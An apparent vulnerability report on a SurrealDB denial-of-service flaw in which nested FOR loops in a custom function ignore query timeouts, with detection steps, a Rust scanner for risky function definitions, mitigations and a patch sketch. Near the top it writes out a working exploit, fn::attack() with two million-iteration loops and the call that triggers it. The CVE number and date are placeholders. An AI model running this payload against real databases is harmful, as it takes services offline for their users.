SurrealDB, Denial of Service, CVE-2023-XXXX (High)

How the CVE Works

SurrealDB lets authenticated users who hold the OWNER or EDITOR role define custom functions with DEFINE FUNCTION. A function body may contain FOR loops, and nothing stops those loops from being nested, each iterating over a large integer range (for example 1..1000000). A single loop of that size is tolerable, but two nested loops multiply to roughly 10^12 iterations, and in affected versions the loop implementation in ForEachStatement never consulted the cancellation or timeout state of the execution context between iterations. Calling such a function therefore pins a CPU core for as long as the loops run, the query timeout is not honoured, and the server stays unresponsive until it is restarted by hand. The root cause is the missing per-iteration cancellation and timeout check in ForEachStatement.

DailyCVE Form

Platform: SurrealDB
Affected versions: < 2.0.5, < 2.1.5, < 2.2.2 (fixed in 2.0.5, 2.1.5 and 2.2.2)
Vulnerability: Denial of service via CPU exhaustion (nested FOR loops in a custom function)
Severity: High
Date: 2023-XX-XX

What Undercode Says:

Exploitation

1. Malicious function creation (custom functions live in the fn:: namespace, so the definition and the call both need the prefix):

DEFINE FUNCTION fn::attack() {
    FOR $i IN 1..1000000 {
        FOR $j IN 1..1000000 {
            // empty loop body: the cost is the ~10^12 iterations themselves
        }
    }
};

2. Execution (any statement that evaluates the function will do):

RETURN fn::attack();

Detection

1. Log analysis (SurrealDB writes its log to stdout/stderr; the path below assumes your service manager redirects it to a file and that the log level is high enough for statement text to be recorded, otherwise search the journal instead):

grep "DEFINE FUNCTION" /var/log/surrealdb.log

2. CPU monitoring (the server binary is named surreal; a core pinned at 100% by it that does not drop after the query timeout is the signature):

top -p $(pgrep -d, surreal)
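
Grepping for DEFINE FUNCTION finds every definition, harmless ones included. The Rust program below is an added example (not SurrealDB code) of a static check that narrows that down: it pulls DEFINE FUNCTION statements out of a query log or schema dump, walks the braces of each body, multiplies the sizes of nested integer ranges, and reports the ones whose innermost loop would run more times than a threshold. The two sample statements are constructed for this example, and the threshold of 100 million is an assumption to be tuned against your deployment's query timeout; ranges that are not integer literals (arrays, subqueries) are counted as 1, so the estimate is a lower bound.

```rust
// Added example (not SurrealDB code): static check for DEFINE FUNCTION bodies
// that nest FOR loops over large integer ranges. SAMPLE is constructed input.

/// What the scanner learned about the loops in one statement.
#[derive(Debug, Clone, PartialEq)]
pub struct LoopReport {
    /// Deepest FOR-inside-FOR nesting seen.
    pub max_depth: usize,
    /// Largest product of enclosing range sizes: how often the innermost body
    /// runs. Non-literal iterables count as 1, so this is a lower bound.
    pub max_iterations: u128,
}

/// Iteration count of a SurrealQL range token such as `1..1000000` or `0..=9`.
fn range_len(tok: &str) -> Option<u128> {
    let (lo, rest) = tok.split_once("..")?;
    let (hi, inclusive) = match rest.strip_prefix('=') {
        Some(h) => (h, 1),
        None => (rest, 0),
    };
    let lo: i128 = lo.parse().ok()?;
    let hi: i128 = hi.parse().ok()?;
    Some((hi - lo + inclusive).max(0) as u128)
}

/// Split a statement into words plus single-character brace/semicolon tokens.
fn tokenize(stmt: &str) -> Vec<String> {
    let mut toks = Vec::new();
    let mut cur = String::new();
    for c in stmt.chars() {
        if c == '{' || c == '}' || c == ';' {
            if !cur.is_empty() { toks.push(std::mem::take(&mut cur)); }
            toks.push(c.to_string());
        } else if c.is_whitespace() {
            if !cur.is_empty() { toks.push(std::mem::take(&mut cur)); }
        } else {
            cur.push(c);
        }
    }
    if !cur.is_empty() { toks.push(cur); }
    toks
}

/// Walk the braces of one statement, multiplying range sizes as FOR bodies nest.
pub fn analyse(stmt: &str) -> LoopReport {
    let toks = tokenize(stmt);
    let mut report = LoopReport { max_depth: 0, max_iterations: 0 };
    let mut brace_opened_loop: Vec<bool> = Vec::new(); // one entry per open '{'
    let mut products: Vec<u128> = vec![1];            // iteration product per loop level
    let mut pending: Option<u128> = None;             // FOR header seen, body '{' not yet
    let mut i = 0;
    while i < toks.len() {
        let t = toks[i].as_str();
        if t.eq_ignore_ascii_case("FOR") && i + 3 < toks.len() && toks[i + 2].eq_ignore_ascii_case("IN") {
            // FOR $var IN <iterable>: anything that is not a literal range counts as 1
            pending = Some(range_len(&toks[i + 3]).unwrap_or(1));
            i += 4;
            continue;
        }
        match t {
            "{" => {
                if let Some(n) = pending.take() {
                    let p = products.last().copied().unwrap_or(1).saturating_mul(n);
                    products.push(p);
                    brace_opened_loop.push(true);
                    report.max_depth = report.max_depth.max(products.len() - 1);
                    report.max_iterations = report.max_iterations.max(p);
                } else {
                    brace_opened_loop.push(false);
                }
            }
            "}" => {
                if brace_opened_loop.pop() == Some(true) { products.pop(); }
            }
            _ => {}
        }
        i += 1;
    }
    report
}

/// DEFINE FUNCTION statements in a log or schema dump; a statement ends at a
/// ';' outside any braces.
pub fn define_function_statements(text: &str) -> Vec<String> {
    let (mut out, mut cur, mut depth) = (Vec::new(), String::new(), 0i32);
    for c in text.chars() {
        match c {
            '{' => depth += 1,
            '}' => depth -= 1,
            ';' if depth == 0 => {
                if cur.to_ascii_uppercase().contains("DEFINE FUNCTION") { out.push(cur.trim().to_string()); }
                cur.clear();
                continue;
            }
            _ => {}
        }
        cur.push(c);
    }
    out
}

/// Statements whose innermost loop body would run more than `threshold` times.
pub fn suspicious_definitions(text: &str, threshold: u128) -> Vec<(String, LoopReport)> {
    define_function_statements(text)
        .into_iter()
        .map(|s| { let r = analyse(&s); (s, r) })
        .filter(|(_, r)| r.max_iterations > threshold)
        .collect()
}

/// Constructed sample: one harmless function and the nested-loop one.
pub const SAMPLE: &str = r#"
DEFINE FUNCTION fn::greet($name: string) { RETURN "Hello, " + $name; };
DEFINE FUNCTION fn::attack() {
    FOR $i IN 1..1000000 {
        FOR $j IN 1..1000000 {
            -- empty loop body
        }
    }
};
"#;

fn main() {
    for (stmt, report) in suspicious_definitions(SAMPLE, 100_000_000) {
        let name = stmt.split_whitespace().nth(2).unwrap_or("?");
        println!("{name}: nesting depth {}, ~{} innermost iterations", report.max_depth, report.max_iterations);
    }
}
```

The scanner is deliberately token-level rather than a real SurrealQL parser: a brace inside a string literal will confuse it, which is acceptable for triage but means a clean report is not proof of absence. Run it over the output of `INFO FOR DB` (which lists defined functions) as well as over logs, so functions defined before logging was enabled are covered too.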

Mitigation

1. Upgrade to a fixed release (2.0.5, 2.1.5 or 2.2.2 depending on the branch you run; the CLI binary is surreal):

surreal upgrade --version 2.2.2

2. Restrict functions until you can upgrade. Denying the function capability is a blunt control (it also blocks the built-in function library), so treat it as temporary and, since the attack needs OWNER or EDITOR rights, also review who holds those roles:

surreal start --deny-funcs

or via env:

export SURREAL_CAPS_DENY_FUNC=1

Patch Analysis

The fix makes the loop consult the execution context on every iteration, so a query that has been cancelled or has passed its timeout stops at the next iteration instead of running the full iteration count (sketch of the added check, not the verbatim diff):

// Patched ForEachStatement: checked once per iteration
if ctx.cancelled() || ctx.timed_out() {
    break;
}
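
To see why the per-iteration check matters, the Rust program below is an added example (not SurrealDB code) that models both behaviours described in "How the CVE Works" and in the patch sketch above. The `Ctx` type and its `cancelled()` / `timed_out()` methods are hypothetical stand-ins for the execution context the patched loop consults; the loop counts mirror the page's exploit. With the check disabled the loop runs to completion regardless of an expired timeout; with it enabled the same 10^12-iteration loop stops within milliseconds of the deadline, or as soon as another thread cancels it.

```rust
// Added example (not SurrealDB code): cooperative cancellation in a nested loop.
// Ctx, cancelled() and timed_out() are hypothetical stand-ins for the real context.
use std::hint::black_box;
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::Arc;
use std::time::{Duration, Instant};

/// Execution context with a query deadline and an externally settable cancel flag.
pub struct Ctx {
    deadline: Instant,
    cancel: Arc<AtomicBool>,
}

impl Ctx {
    pub fn new(timeout: Duration) -> Self {
        Ctx { deadline: Instant::now() + timeout, cancel: Arc::new(AtomicBool::new(false)) }
    }
    /// Handle another thread (client disconnect, KILL) can use to cancel the query.
    pub fn cancel_handle(&self) -> Arc<AtomicBool> { Arc::clone(&self.cancel) }
    pub fn cancelled(&self) -> bool { self.cancel.load(Ordering::Acquire) }
    pub fn timed_out(&self) -> bool { Instant::now() >= self.deadline }
}

#[derive(Debug, PartialEq, Eq)]
pub enum Outcome { Completed, Cancelled, TimedOut }

#[derive(Debug)]
pub struct RunResult { pub outcome: Outcome, pub iterations: u64 }

/// Two nested FOR loops like fn::attack(). With `check_ctx == false` the loop
/// never looks at the context (the vulnerable behaviour) and runs outer*inner
/// iterations whatever the timeout says. With `check_ctx == true` the fix's
/// per-iteration check is in place and the loop returns at the first iteration
/// after the query is cancelled or the deadline passes.
pub fn nested_loop(ctx: &Ctx, outer: u64, inner: u64, check_ctx: bool) -> RunResult {
    let mut iterations: u64 = 0;
    for _i in 0..outer {
        for _j in 0..inner {
            if check_ctx {
                if ctx.cancelled() {
                    return RunResult { outcome: Outcome::Cancelled, iterations };
                }
                if ctx.timed_out() {
                    return RunResult { outcome: Outcome::TimedOut, iterations };
                }
            }
            // black_box keeps the optimiser from deleting the empty body.
            iterations = black_box(iterations + 1);
        }
    }
    RunResult { outcome: Outcome::Completed, iterations }
}

fn main() {
    // Vulnerable path, scaled down: 1_000_000 x 1_000_000 unchecked would take hours.
    let ctx = Ctx::new(Duration::from_millis(10));
    std::thread::sleep(Duration::from_millis(20)); // deadline has already passed
    let r = nested_loop(&ctx, 1_000, 1_000, false);
    println!("unpatched: {:?} after {} iterations despite an expired timeout", r.outcome, r.iterations);

    // Patched path with the exploit's full iteration count and a 50 ms timeout.
    let ctx = Ctx::new(Duration::from_millis(50));
    let r = nested_loop(&ctx, 1_000_000, 1_000_000, true);
    println!("patched: {:?} after {} iterations", r.outcome, r.iterations);

    // Patched path cancelled from another thread (models a client disconnect).
    let ctx = Ctx::new(Duration::from_secs(60));
    let flag = ctx.cancel_handle();
    std::thread::spawn(move || {
        std::thread::sleep(Duration::from_millis(20));
        flag.store(true, Ordering::Release);
    });
    let r = nested_loop(&ctx, 1_000_000, 1_000_000, true);
    println!("patched: {:?} after {} iterations", r.outcome, r.iterations);
}
```

The check costs a clock read per iteration; a real engine would typically poll every N iterations to amortise that, which still bounds the overrun to N iterations rather than the whole loop.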

References

GitHub advisory: https://github.com/advisories/GHSA-pxw4-94j3-v9pf

End of Report